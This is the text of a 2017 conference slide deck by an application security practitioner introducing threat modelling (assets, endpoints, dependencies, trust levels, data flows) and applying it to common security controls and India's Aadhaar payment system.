Slide 1

Slide 1 text

IT'S THE THREAT MODEL, SILLY! #INCLUDE | GO-JEK | MAY 2017 AKASH MAHAJAN - DIRECTOR APPSECCO

Slide 2

Slide 2 text

WHAT IS A THREAT MODEL? WHAT EXACTLY IS A THREAT MODEL?

Slide 3

Slide 3 text

MODEL REAL MODEL REAL

Slide 4

Slide 4 text

IN COMPUTER SECURITY A THREAT IS A POSSIBLE DANGER THAT MIGHT EXPLOIT A VULNERABILITY TO BREACH SECURITY AND THEREFORE CAUSE POSSIBLE HARM. From Wikipedia for Threat (Computer) CONTROL THREAT

Slide 5

Slide 5 text

THREATS CAN BE INTENTIONAL ACCIDENTAL FIRES QUAKE STORM FLOOD

Slide 6

Slide 6 text

AND SOMETIMES…

Slide 7

Slide 7 text

THREAT MODELLING IS A CONCEPTUAL MODEL FOCUSSING ON DATA FLOW MODELLING Mostly from Wikipedia

Slide 8

Slide 8 text

DATA FLOW DIAGRAMS CREATED WITH A FEW PRIMITIVES

Slide 9

Slide 9 text

A GOOD WAY TO CONSUME DATA IS WITH LISTS

Slide 10

Slide 10 text

IT’S THE THREAT MODEL, SILLY! FOR THREAT MODELLING WE LISTS THAT WE SHOULD HAVE ✓Assets ✓Endpoints ✓External Dependencies ✓Trust Levels ✓and Data Flow Diagrams

Slide 11

Slide 11 text

ASSETS What is that we need to protect? IT’S THE THREAT MODEL, SILLY!

Slide 12

Slide 12 text

ENDPOINTS What are the ways, someone will interact with the system? IT’S THE THREAT MODEL, SILLY!

Slide 13

Slide 13 text

EXTERNAL DEPENDENCIES What does the system need to operate? IT’S THE THREAT MODEL, SILLY!

Slide 14

Slide 14 text

TRUST LEVELS What are the varying degree of trust levels we will have as part of the interaction ? IT’S THE THREAT MODEL, SILLY!

Slide 15

Slide 15 text

DATA FLOW DIAGRAMS What are the various ways data will flow in the system? IT’S THE THREAT MODEL, SILLY!

Slide 16

Slide 16 text

THREAT MODELLING 101 - MAZAA EDITION

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

EVERYTHING THAT IS RELATED TO SECURITY DEFENCE HAS TO BE LOOKED AT FROM THE POINT OF VIEW OF A THREAT MODEL Our Assertion IT’S THE THREAT MODEL, SILLY!

Slide 19

Slide 19 text

LETS LOOK AT SOME OF THE SECURITY CONTROLS FROM THE POINT OF VIEW OF THREAT MODELLING

Slide 20

Slide 20 text

IT’S THE THREAT MODEL, SILLY! PASSWORDS ▸ Why do we want to store passwords in a non-reversible manner? ▸ Why do we want to use a per password salt? ▸ Why do we want to slow down the rate at which hashes can be calculated?

Slide 21

Slide 21 text

IT’S THE THREAT MODEL, SILLY! CSRF TOKEN ▸ Why do we need a CSRF token? ▸ Why do we need to ensure that we can check for origin?

Slide 22

Slide 22 text

IT’S THE THREAT MODEL, SILLY! SSL/TLS ▸ How does the browser know that it can trust the initial certificate from the server?

Slide 23

Slide 23 text

IT’S THE THREAT MODEL, SILLY! SUB RESOURCE INTERGITY ▸ How does SRI help us stay safe?

Slide 24

Slide 24 text

IT’S THE THREAT MODEL, SILLY! YOUR FAVOURITE CONTROL ▸ Lets add some questions about it, to understand the possible threat model it was created for

Slide 25

Slide 25 text

CONTROL MOVIE THREAT REAL THREAT

Slide 26

Slide 26 text

SOMETIMES SECURITY CONTROLS INTRODUCE NEW ATTACK SURFACE Heard of CertificateTransparency Logs? IT’S THE THREAT MODEL, SILLY!

Slide 27

Slide 27 text

WITHOUT "CONTEXT" SECURITY CONTROLS WILL NOT DO WHAT WE "HOPE" THEY SHOULD DO It is essential that we understand the basic threat model for which a control was envisioned, designed and implemented IT’S THE THREAT MODEL, SILLY!

Slide 28

Slide 28 text

IT’S THE THREAT MODEL, SILLY! AADHAAR ENABLED PAYMENT SYSTEMS + ONE TIME PASSWORDS ▸ Why does it pose problems? ▸ The things that the architects maybe didn’t think about ▸ Rouge merchants can modify apps in the mobile Point of sale to store fingerprints ▸ GSM and mobile networks can allow sniffing of SMS text messages

Slide 29

Slide 29 text

IT’S THE THREAT MODEL, SILLY! FOR AND AGAINST AADHAAR Assets UIDAI can’t figure out what is worth stealing External dependency UIDAI feel that leakage of information is not at their end, so they are not responsible Trust Levels UIDAI believe that all bankers and telcos can be trusted with sensitive data Endpoints There is no easy way to figure out what is an official channel or private channel for sharing data

Slide 30

Slide 30 text

SO IN A WAY BOTH THE POINT OF VIEWS ARE RIGHT

Slide 31

Slide 31 text

IT’S THE THREAT MODEL, SILLY! SCOPE CREEP - HAPPENS TO ALL THINGS THAT WORK INCLUDING THE INTERNET •Otherwise all working systems are afflicted by scope creep. They are asked to take on functions that they were not designed for. Every such function adds • Assets worth stealing • Endpoints worth investigating • External dependencies that may be insecure • Trust levels that are not thoroughly vetted • And miss some of the data flows

Slide 32

Slide 32 text

IT’S THE THREAT MODEL, SILLY!

Slide 33

Slide 33 text

THAT APPLICATION SECURITY GUY

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

QUESTIONS @makash | https://linkd.in/webappsecguy | [email protected]